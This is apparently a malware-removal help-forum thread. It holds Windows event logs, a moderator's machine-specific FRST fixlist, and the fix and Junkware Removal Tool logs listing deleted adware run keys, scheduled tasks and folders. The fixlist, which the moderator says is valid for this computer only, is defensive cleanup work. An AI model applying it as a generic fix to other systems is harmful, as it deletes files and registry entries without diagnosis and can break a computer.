Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe

Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1

Error: (11/12/2014 01:54:16 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20605 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1084

Start Time: 01cffea8a4ead6b7

Termination Time: 4294967295

Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\LiveComm.exe

Report Id: 4b52672a-6a9d-11e4-8288-645a04a55516

Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe

Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1

Error: (11/12/2014 01:30:20 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20605 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 19e8

Start Time: 01cffea54cec3494

Termination Time: 4294967295

Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\LiveComm.exe

Report Id: f3e85d44-6a99-11e4-8287-645a04a55516

Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe

Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1

Error: (11/12/2014 01:15:50 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20605 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1f9c

Start Time: 01cffea3f8bd5c37

Termination Time: 4294967295

Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\LiveComm.exe

Report Id: ec464096-6a97-11e4-8287-645a04a55516

Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe

Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1

Error: (11/12/2014 01:12:01 PM) (Source: MsiInstaller) (EventID: 11316) (User: NT AUTHORITY)
Description: Product: Google Update Helper -- Error 1316. The specified account already exists.

Error: (11/12/2014 01:10:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20605 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1ec0

Start Time: 01cffea31ee01d1b

Termination Time: 4294967295

Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\LiveComm.exe

Report Id: 12663451-6a97-11e4-8287-645a04a55516

Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe

Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1

Error: (11/12/2014 00:59:53 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20605 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: da0

Start Time: 01cffea15adfafc2

Termination Time: 4294967295

Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\LiveComm.exe

Report Id: a7d78db9-6a95-11e4-8287-645a04a55516

Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe

Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1

Error: (11/12/2014 00:33:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 38.0.2125.111, time stamp: 0x5447163b
Faulting module name: chrome.dll, version: 38.0.2125.111, time stamp: 0x54471342
Exception code: 0xc0000005
Fault offset: 0x001d4a41
Faulting process id: 0x1818
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3
Faulting package full name: chrome.exe4
Faulting package-relative application ID: chrome.exe5

Error: (11/12/2014 00:33:13 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20605 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1070

Start Time: 01cffe8609a3aaa9

Termination Time: 4294967295

Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\LiveComm.exe

Report Id: e6562756-6a91-11e4-8287-645a04a55516

Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe

Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1

System errors:
=============
Error: (11/12/2014 02:13:40 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The McAfee Inc. mfeapfk service failed to start due to the following error:
%%1243

Error: (11/12/2014 02:12:56 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Apple Mobile Device service failed to start due to the following error:
%%109

Error: (11/12/2014 02:12:23 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
%%1056

Error: (11/12/2014 02:11:51 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The SoftThinks Agent Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (11/12/2014 02:11:51 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The iPod Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (11/12/2014 02:11:51 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The ZAtheros Wlan Agent service terminated unexpectedly.  It has done this 1 time(s).

Error: (11/12/2014 02:11:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Intel® Management and Security Application Local Management Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (11/12/2014 02:11:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (11/12/2014 02:11:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Media Player Network Sharing Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (11/12/2014 02:11:51 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Intel® Management and Security Application User Notification Service service terminated unexpectedly.  It has done this 1 time(s).

Microsoft Office Sessions:
=========================
Error: (11/12/2014 02:12:02 PM) (Source: MsiInstaller) (EventID: 11316) (User: NT AUTHORITY)
Description: Product: Google Update Helper -- Error 1316. The specified account already exists.
(NULL)(NULL)(NULL)(NULL)(NULL)

Error: (11/12/2014 01:54:23 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20605108401cffea8a4ead6b74294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\LiveComm.exe4e57a951-6a9d-11e4-8288-645a04a55516microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1

Error: (11/12/2014 01:54:16 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20605108401cffea8a4ead6b74294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\LiveComm.exe4b52672a-6a9d-11e4-8288-645a04a55516microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1

Error: (11/12/2014 01:30:20 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.2060519e801cffea54cec34944294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\LiveComm.exef3e85d44-6a99-11e4-8287-645a04a55516microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1

Error: (11/12/2014 01:15:50 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.206051f9c01cffea3f8bd5c374294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\LiveComm.exeec464096-6a97-11e4-8287-645a04a55516microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1

Error: (11/12/2014 01:12:01 PM) (Source: MsiInstaller) (EventID: 11316) (User: NT AUTHORITY)
Description: Product: Google Update Helper -- Error 1316. The specified account already exists.
(NULL)(NULL)(NULL)(NULL)(NULL)

Error: (11/12/2014 01:10:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.206051ec001cffea31ee01d1b4294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\LiveComm.exe12663451-6a97-11e4-8287-645a04a55516microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1

Error: (11/12/2014 00:59:53 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20605da001cffea15adfafc24294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\LiveComm.exea7d78db9-6a95-11e4-8287-645a04a55516microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1

Error: (11/12/2014 00:33:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: chrome.exe38.0.2125.1115447163bchrome.dll38.0.2125.11154471342c0000005001d4a41181801cffe9ed70d5a8cC:\Program Files (x86)\Google\Chrome\Application\chrome.exeC:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\chrome.dll157fcc50-6a92-11e4-8287-645a04a55516

Error: (11/12/2014 00:33:13 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20605107001cffe8609a3aaa94294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\LiveComm.exee6562756-6a91-11e4-8287-645a04a55516microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1

CodeIntegrity Errors:
===================================
  Date: 2014-08-21 16:30:55.910
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\services.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Movies App\Datamngr\apcrtldr.dll that did not meet the Windows signing level requirements.

  Date: 2014-08-21 16:30:55.785
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\services.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Movies App\Datamngr\x64\apcrtldr.dll that did not meet the Windows signing level requirements.

  Date: 2014-08-20 22:03:57.595
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\services.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Movies App\Datamngr\apcrtldr.dll that did not meet the Windows signing level requirements.

  Date: 2014-08-20 22:03:57.470
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\services.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Movies App\Datamngr\x64\apcrtldr.dll that did not meet the Windows signing level requirements.

  Date: 2014-08-20 19:38:02.969
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\services.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Movies App\Datamngr\apcrtldr.dll that did not meet the Windows signing level requirements.

  Date: 2014-08-20 19:38:02.813
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\services.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Movies App\Datamngr\x64\apcrtldr.dll that did not meet the Windows signing level requirements.

  Date: 2014-08-20 07:05:19.787
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\services.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Movies App\Datamngr\apcrtldr.dll that did not meet the Windows signing level requirements.

  Date: 2014-08-20 07:05:19.631
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\services.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Movies App\Datamngr\x64\apcrtldr.dll that did not meet the Windows signing level requirements.

  Date: 2014-08-15 15:58:12.873
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Movies App\Datamngr\apcrtldr.dll that did not meet the Windows signing level requirements.

  Date: 2014-08-15 15:58:12.646
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Movies App\Datamngr\x64\apcrtldr.dll that did not meet the Windows signing level requirements.

==================== Memory info ===========================

Processor: Intel® Pentium® CPU 2127U @ 1.90GHz
Percentage of memory in use: 47%
Total physical RAM: 3977.27 MB
Available physical RAM: 2097.08 MB
Total Pagefile: 4873.27 MB
Available Pagefile: 3016.98 MB
Total Virtual: 131072 MB
Available Virtual: 131071.8 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:451.92 GB) (Free:394.92 GB) NTFS
Drive y: (WINRETOOLS) (Fixed) (Total:0.48 GB) (Free:0.2 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 78A8938B)

Partition: GPT Partition Type.

==================== End Of Log ============================


  • 0

#4
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
OK more to kill, on completion of this can you let me know what problems remain

You will need to uninstall Chrome as it has been changed to developer mode which means there are no security features present

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:
 

HKLM\...\Run: [SpywareClearShield] => C:\Program Files (x86)\Spyware Clear\SpywareClearShield.exe
HKLM\...\Run: [SpywareClearUpdater] => C:\Program Files (x86)\Spyware Clear\SpywareClearUpdate.exe GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
SearchScopes: HKCU - DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKCU - {D4081D33-6F22-48A3-8C77-50B7381FA1AE} URL =
CHR StartupUrls: Default -> "hxxp://www.trovi.com/?gd=&ctid=CT3330389&octid=EB_ORIGINAL_CTID&ISID=M7BB70274-6B99-4688-B46C-0E1CA51F6087&SearchSource=55&CUI=&UM=6&UP=SPC0F8B4F2-3D31-425F-BF6E-6B56E5390FD1&SSPV="
CHR DefaultSuggestURL: Default -> http://suggest.secci...x={searchTerms}
CHR Profile: C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default
2014-11-12 09:20 - 2014-11-12 09:20 - 00081264 _____ (Premium Installer ) C:\Users\Nick\Downloads\setup(5).exe
2014-11-12 09:18 - 2014-11-12 09:19 - 00081264 _____ (Premium Installer ) C:\Users\Nick\Downloads\setup(4).exe
2014-11-12 09:16 - 2014-11-12 09:16 - 00081264 _____ (Premium Installer ) C:\Users\Nick\Downloads\setup(3).exe
2014-11-11 20:33 - 2014-11-11 20:33 - 00750440 _____ () C:\Users\Nick\Downloads\Setup(2).exe
2014-11-11 20:31 - 2014-11-11 20:32 - 00081264 _____ (Premium Installer ) C:\Users\Nick\Downloads\setup(1).exe
2014-11-09 09:32 - 2014-11-09 09:32 - 04055840 _____ (Download Freely, LLC ) C:\Users\Nick\Downloads\MPlayer [1].exe
2014-11-09 09:32 - 2014-11-09 09:32 - 00722824 _____ ( ) C:\Users\Nick\Downloads\MPlayer.exe
2014-10-17 20:15 - 2014-11-11 14:01 - 00003448 _____ () C:\WINDOWS\System32\Tasks\ISpeedPC_LogOn
2014-11-12 14:20 - 2014-08-21 06:52 - 00000376 _____ () C:\WINDOWS\Tasks\CIMT_S-1-5-21-638231278-2563524819-3576094203-1001.job
2014-11-12 14:13 - 2013-08-22 08:25 - 00524288 ___SH () C:\WINDOWS\system32\config\BBI
2014-11-12 13:58 - 2014-08-20 10:29 - 00000000 ____D () C:\Users\Nick\Desktop\Spyware Removers
2014-11-12 13:52 - 2013-08-22 10:36 - 00000000 ____D () C:\WINDOWS\system32\NDF
2014-11-11 14:41 - 2014-08-13 02:47 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\Open Download Manager
2014-11-11 14:41 - 2014-08-13 02:45 - 00000000 ____D () C:\Program Files (x86)\OpenDownloaderManager
2014-11-11 14:37 - 2014-09-23 15:18 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\ISpeedPC
2014-11-11 14:01 - 2014-09-23 15:18 - 00003892 _____ () C:\WINDOWS\System32\Tasks\ISpeedPC_Daily
Task: {224F9424-7C34-41D7-B2E1-8D302EF2221D} - System32\Tasks\Microsoft\Windows\Multimedia\SMupdate3 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update3 <==== ATTENTION
Task: {2AAD946D-AC7D-4CF9-852A-7DA8AF8C0FB7} - System32\Tasks\ISpeedPC_LogOn => C:\Program Files (x86)\iSpeedPC\ISpeedPC.exe
Task: {4EDF987C-D75F-4C07-A287-635A1A1108B8} - \f0ca9306-e03d-4628-913b-65aa86c909c3-4 No Task File <==== ATTENTION
Task: {6CC09012-A747-4959-8588-14BAB0BE6320} - System32\Tasks\Microsoft\Windows\Maintenance\SMupdate2 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update2 <==== ATTENTION
Task: {76F2B453-E3B6-4E38-8066-FCC61F4EAC85} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {7C59F4C2-41D5-4A06-A579-36A44EBA8E71} - System32\Tasks\ISpeedPC_Daily => C:\Program Files (x86)\iSpeedPC\ISpeedPC.exe
C:\Program Files (x86)\Spyware Clear
EmptyTemp:
CMD: bitsadmin /reset /allusers


Save this as fixlist.txt, in the same location as FRST.exe
Run FRST and press Fix
On completion a log will be generated please post that


THEN

Please download Junkware Removal Tool to your desktop.
  • Right-mouse click JRT.exe and select "Run as Administrator" the tool will open and start scanning your system
  • please be patient as this can take a while to complete depending on your system's specifications
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • post the contents of JRT.txt into your next message.

  • 0

#5
miszeewithkids!

miszeewithkids!

    Member

  • Topic Starter
  • Member
  • PipPip
  • 35 posts

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 10-11-2014
Ran by Nick at 2014-11-12 15:15:01 Run:2
Running from C:\Users\Nick\Desktop\Spyware Tools
Loaded Profile: Nick (Available profiles: Nick)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
HKLM\...\Run: [SpywareClearShield] => C:\Program Files (x86)\Spyware Clear\SpywareClearShield.exe
HKLM\...\Run: [SpywareClearUpdater] => C:\Program Files (x86)\Spyware Clear\SpywareClearUpdate.exe GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
SearchScopes: HKCU - DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKCU - {D4081D33-6F22-48A3-8C77-50B7381FA1AE} URL =
CHR StartupUrls: Default -> "hxxp://www.trovi.com/?gd=&ctid=CT3330389&octid=EB_ORIGINAL_CTID&ISID=M7BB70274-6B99-4688-B46C-0E1CA51F6087&SearchSource=55&CUI=&UM=6&UP=SPC0F8B4F2-3D31-425F-BF6E-6B56E5390FD1&SSPV="
CHR DefaultSuggestURL: Default -> http://suggest.secci...x={searchTerms}
CHR Profile: C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default
2014-11-12 09:20 - 2014-11-12 09:20 - 00081264 _____ (Premium Installer ) C:\Users\Nick\Downloads\setup(5).exe
2014-11-12 09:18 - 2014-11-12 09:19 - 00081264 _____ (Premium Installer ) C:\Users\Nick\Downloads\setup(4).exe
2014-11-12 09:16 - 2014-11-12 09:16 - 00081264 _____ (Premium Installer ) C:\Users\Nick\Downloads\setup(3).exe
2014-11-11 20:33 - 2014-11-11 20:33 - 00750440 _____ () C:\Users\Nick\Downloads\Setup(2).exe
2014-11-11 20:31 - 2014-11-11 20:32 - 00081264 _____ (Premium Installer ) C:\Users\Nick\Downloads\setup(1).exe
2014-11-09 09:32 - 2014-11-09 09:32 - 04055840 _____ (Download Freely, LLC ) C:\Users\Nick\Downloads\MPlayer [1].exe
2014-11-09 09:32 - 2014-11-09 09:32 - 00722824 _____ ( ) C:\Users\Nick\Downloads\MPlayer.exe
2014-10-17 20:15 - 2014-11-11 14:01 - 00003448 _____ () C:\WINDOWS\System32\Tasks\ISpeedPC_LogOn
2014-11-12 14:20 - 2014-08-21 06:52 - 00000376 _____ () C:\WINDOWS\Tasks\CIMT_S-1-5-21-638231278-2563524819-3576094203-1001.job
2014-11-12 14:13 - 2013-08-22 08:25 - 00524288 ___SH () C:\WINDOWS\system32\config\BBI
2014-11-12 13:58 - 2014-08-20 10:29 - 00000000 ____D () C:\Users\Nick\Desktop\Spyware Removers
2014-11-12 13:52 - 2013-08-22 10:36 - 00000000 ____D () C:\WINDOWS\system32\NDF
2014-11-11 14:41 - 2014-08-13 02:47 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\Open Download Manager
2014-11-11 14:41 - 2014-08-13 02:45 - 00000000 ____D () C:\Program Files (x86)\OpenDownloaderManager
2014-11-11 14:37 - 2014-09-23 15:18 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\ISpeedPC
2014-11-11 14:01 - 2014-09-23 15:18 - 00003892 _____ () C:\WINDOWS\System32\Tasks\ISpeedPC_Daily
Task: {224F9424-7C34-41D7-B2E1-8D302EF2221D} - System32\Tasks\Microsoft\Windows\Multimedia\SMupdate3 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update3 <==== ATTENTION
Task: {2AAD946D-AC7D-4CF9-852A-7DA8AF8C0FB7} - System32\Tasks\ISpeedPC_LogOn => C:\Program Files (x86)\iSpeedPC\ISpeedPC.exe
Task: {4EDF987C-D75F-4C07-A287-635A1A1108B8} - \f0ca9306-e03d-4628-913b-65aa86c909c3-4 No Task File <==== ATTENTION
Task: {6CC09012-A747-4959-8588-14BAB0BE6320} - System32\Tasks\Microsoft\Windows\Maintenance\SMupdate2 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update2 <==== ATTENTION
Task: {76F2B453-E3B6-4E38-8066-FCC61F4EAC85} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {7C59F4C2-41D5-4A06-A579-36A44EBA8E71} - System32\Tasks\ISpeedPC_Daily => C:\Program Files (x86)\iSpeedPC\ISpeedPC.exe
C:\Program Files (x86)\Spyware Clear
EmptyTemp:
CMD: bitsadmin /reset /allusers

*****************

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\SpywareClearShield => Value not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\SpywareClearUpdater => Value not found.
"HKLM\SOFTWARE\Policies\Google" => Key not found.
HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D4081D33-6F22-48A3-8C77-50B7381FA1AE}" => Key deleted successfully.
"HKCR\CLSID\{D4081D33-6F22-48A3-8C77-50B7381FA1AE}" => Key not found.
Chrome StartupUrls not detected.
Chrome DefaultSuggestURL not detected.
CHR Profile: C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default => Error: No automatic fix found for this entry.
"C:\Users\Nick\Downloads\setup(5).exe" => File/Directory not found.
"C:\Users\Nick\Downloads\setup(4).exe" => File/Directory not found.
"C:\Users\Nick\Downloads\setup(3).exe" => File/Directory not found.
"C:\Users\Nick\Downloads\Setup(2).exe" => File/Directory not found.
"C:\Users\Nick\Downloads\setup(1).exe" => File/Directory not found.
"C:\Users\Nick\Downloads\MPlayer [1].exe" => File/Directory not found.
"C:\Users\Nick\Downloads\MPlayer.exe" => File/Directory not found.
"C:\WINDOWS\System32\Tasks\ISpeedPC_LogOn" => File/Directory not found.
"C:\WINDOWS\Tasks\CIMT_S-1-5-21-638231278-2563524819-3576094203-1001.job" => File/Directory not found.
Could not move "C:\WINDOWS\system32\config\BBI" => Scheduled to move on reboot.
"C:\Users\Nick\Desktop\Spyware Removers" => File/Directory not found.

"C:\WINDOWS\system32\NDF" directory move:

C:\WINDOWS\system32\NDF\eventlog.etl => Moved successfully.
Could not move "C:\WINDOWS\system32\NDF" directory. => Scheduled to move on reboot.

C:\Users\Nick\AppData\Roaming\Open Download Manager => Moved successfully.
C:\Program Files (x86)\OpenDownloaderManager => Moved successfully.
C:\Users\Nick\AppData\Roaming\ISpeedPC => Moved successfully.
C:\WINDOWS\System32\Tasks\ISpeedPC_Daily => Moved successfully.

=> Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2014-11-12 15:15:46)<=

==> ATTENTION: System is not rebooted.
"C:\WINDOWS\system32\config\BBI" => File could not move.
C:\WINDOWS\system32\NDF => Moved successfully.

==== End of Fixlog ====

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.7 (11.08.2014:1)
OS: Windows 8.1 x64
Ran by Nick on Wed 11/12/2014 at 15:16:58.23
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

~~~ Services

Successfully stopped: [Service] couponprinterservice
Successfully deleted: [Service] couponprinterservice

 

~~~ Registry Values

Successfully deleted: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\driver support

 

~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog\Application\update smarterpower
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{f1bf4d17-a17e-4311-ba3a-ec4384e7ee35}
Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{f1bf4d17-a17e-4311-ba3a-ec4384e7ee35}
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{f1bf4d17-a17e-4311-ba3a-ec4384e7ee35}
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{f1bf4d17-a17e-4311-ba3a-ec4384e7ee35}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{f1bf4d17-a17e-4311-ba3a-ec4384e7ee35}
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{f1bf4d17-a17e-4311-ba3a-ec4384e7ee35}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{f1bf4d17-a17e-4311-ba3a-ec4384e7ee35}

 

~~~ Files

Successfully deleted: [File] "C:\WINDOWS\couponprinter.ocx"
Successfully deleted: [File] C:\WINDOWS\prefetch\24X7HELP.EXE-CBD72E7B.pf
Successfully deleted: [File] C:\WINDOWS\prefetch\24X7HELP.TMP-BA3CAE1F.pf
Successfully deleted: [File] C:\WINDOWS\prefetch\APP24X7HELP.EXE-B9A705E9.pf
Successfully deleted: [File] C:\WINDOWS\prefetch\APP24X7HOOK.EXE-934D4D19.pf
Successfully deleted: [File] C:\WINDOWS\prefetch\APP24X7HOOK64.EXE-8F701D6B.pf
Successfully deleted: [File] C:\WINDOWS\prefetch\APP24X7SVC.EXE-BB91C528.pf
Successfully deleted: [File] C:\WINDOWS\prefetch\DRIVERSUPPORT.EXE-7B99C79B.pf

 

~~~ Folders

Successfully deleted: [Folder] "C:\Users\Nick\appdata\local\pc_drivers_headquarters"
Successfully deleted: [Folder] "C:\Program Files (x86)\coupons"

 

~~~ FireFox

Emptied folder: C:\Users\Nick\AppData\Roaming\mozilla\firefox\profiles\1hcaal8x.default\minidumps [3 files]

 

~~~ Event Viewer Logs were cleared

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 11/12/2014 at 15:24:10.33
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


  • 0

#6
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
How is the computer behaving now ?
  • 0

#7
miszeewithkids!

miszeewithkids!

    Member

  • Topic Starter
  • Member
  • PipPip
  • 35 posts

you are awesome!  So far its perfect!  Love you guys!  Always count on you!!!!!!!!!


  • 0

#8
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
